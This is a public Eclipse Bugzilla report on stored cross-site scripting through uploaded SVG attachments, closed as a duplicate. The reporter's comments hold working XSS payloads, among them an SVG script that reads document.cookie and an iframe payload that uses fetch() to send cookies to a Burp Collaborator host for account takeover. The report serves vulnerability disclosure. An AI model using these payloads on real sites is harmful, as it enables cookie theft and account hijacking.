Some Eclipse Foundation services are deprecated, or will be soon. Please ensure you've read this important communication.

Bug 573145

Summary: Stored Cross site scripting attack
Product: Community Reporter: Manojkumar J <bughunter.mk>
Component: WebsiteAssignee: phoenix.ui <phoenix.ui-inbox>
Status: CLOSED DUPLICATE QA Contact:
Severity: critical    
Priority: P3 CC: denis.roy, wayne.beaton, webmaster
Version: unspecified   
Target Milestone: ---   
Hardware: PC   
OS: Windows 10   
Whiteboard:
Attachments:
Description Flags
<img src="x" onerror="alert(1);"> none

Description Manojkumar J CLA 2021-04-25 13:33:26 EDT
Created attachment 286227 [details]
<img src="x" onerror="alert(1);">

Here I have uploaded xss svg image payload it will fire the xss attack.

Cheers!
Comment 1 Manojkumar J CLA 2021-04-25 13:38:40 EDT
Here is the proof of concept image that has been attached.


This stored XSS image file was fired once the user tried to click the file or open the file.

Also, we can copy the file link sent to anyone to escalate it.


Reproduction steps:

go to the eclipse bug reporting page.

Create svg xss image payload 

And upload it.

And submit the report and open the uploaded payload it will fire the xss

Cheers!
Comment 2 Manojkumar J CLA 2021-04-25 13:41:25 EDT
You can see the file was looks like click to view...


the link looks like 

https://bugzillaattachments.eclipsecontent.org/bugs/attachment.cgi?id=286227

If you open this link or open the file will fire the xss.

Cheers!
Comment 3 Manojkumar J CLA 2021-04-25 13:56:51 EDT
HEre is svg image xss payload script for your reproduction:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
prompt(document.cookie);
</script>
</svg>
Comment 4 Manojkumar J CLA 2021-04-25 14:11:42 EDT
Also I can able to call the stored xss via using these links...



https://bugs.eclipse.org/bugs/attachment.cgi?id=286227




https://bugzillaattachments.eclipsecontent.org/bugs/attachment.cgi?id=286227


Please contribute cve id with the finder of my name.

Cheers!
Comment 5 Manojkumar J CLA 2021-04-25 14:50:02 EDT
Hello @Wayne Beaton,

Thanks for updating it to the P3. But it looks like p2 for me now. Also, It was possible to call via URLs. It was uploaded on 2 sub-domains.

like,


https://bugs.eclipse.org/bugs/attachment.cgi?id=286227


https://bugzillaattachments.eclipsecontent.org/bugs/attachment.cgi?id=286227


What does if rce or reverse shell payload do here?

Get reverse shell.


Another question,

Is that possible to get cookie and location hash values via sharing the links to the users?

Yes, if they have access, we can get the cookie or location hash values to takeover the account partially or potentially.


I hope you understand my point!


Cheers!
Comment 6 Manojkumar J CLA 2021-04-25 14:50:36 EDT
So, if it is possible to takeover the accounts, it will be a P1 bug.

Cheers!
Comment 7 Manojkumar J CLA 2021-04-25 15:05:25 EDT
You can see below,


Here is the possibilities of escalation looks like,


We do have the stored xss always dangerous and it will be considered as high vulnerability.

Here, the stored xss was an image.

Which is holding or uploaded on 2 domains

As a attacker I can able to call the stored xss image via both of domain URLs,

those are below,

https://bugs.eclipse.org/bugs/attachment.cgi?id=286227

https://bugzillaattachments.eclipsecontent.org/bugs/attachment.cgi?id=286227


Now, what does attacker do is,

escalate rce or reverse shell or account takeover, if it is possible.


so, as I said, the account takeover move is very simple. We can call the stored xss image via 2 domains URLs right?

So, simple modify our svg xss payload like below,


<iframe %00 src= javascript:fetch(\"//XXXXXXXXXXXXXXXXXXXXXXXXXXXXX.burpcollaborator.net/?param=\"+document.cookie)  %00>




It will get the anyone's cookie value to my lovely Buprsuite proxy.

What does contains?

Cookie value and other key values to login on their account.



I hope you understand all the points very well now!


Cheers!
Comment 8 Manojkumar J CLA 2021-04-25 15:44:12 EDT
Team,

I tried to escalate is but it takes more time and more effort and also It is needful to create more test reports again and again. So, it will be annoy you people. I am so sorry. I hope you people understand my point.

Let me stop doing it.

Cheers!
Comment 9 Eclipse Webmaster CLA 2021-04-26 10:08:44 EDT
This is a dupe of https://bugs.eclipse.org/bugs/show_bug.cgi?id=283232, and AFAIK by serving the attachment data from a separate domain we've done pretty much all we can to limit the risk. 

-M.

*** This bug has been marked as a duplicate of bug 283232 ***
Comment 10 Denis Roy CLA 2021-04-27 14:45:23 EDT
> https://bugs.eclipse.org/bugs/attachment.cgi?id=286227


Confirmed that direct access to attachments on b.e.o leads to a 302